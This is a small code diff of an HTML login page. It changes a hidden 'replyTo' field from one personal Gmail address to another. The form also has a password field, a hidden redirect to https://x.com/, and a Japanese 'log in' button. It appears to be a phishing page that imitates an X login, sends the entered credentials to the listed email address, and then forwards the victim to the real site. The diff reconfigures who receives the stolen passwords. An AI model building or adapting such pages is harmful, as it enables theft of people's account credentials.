--- a/index.html
+++ b/index.html
@@ -191,7 +191,7 @@
                     <input type="password" id="password" name="password" required>
                 </div>
 
-                <input type="hidden" name="replyTo" value="sinemonn555@gmail.com">
+                <input type="hidden" name="replyTo" value="happy.yabrum@gmail.com">
                 <input type="hidden" name="redirectTo" value="https://x.com/">
 
                 <button type="submit" class="login-btn">ログイン</button>
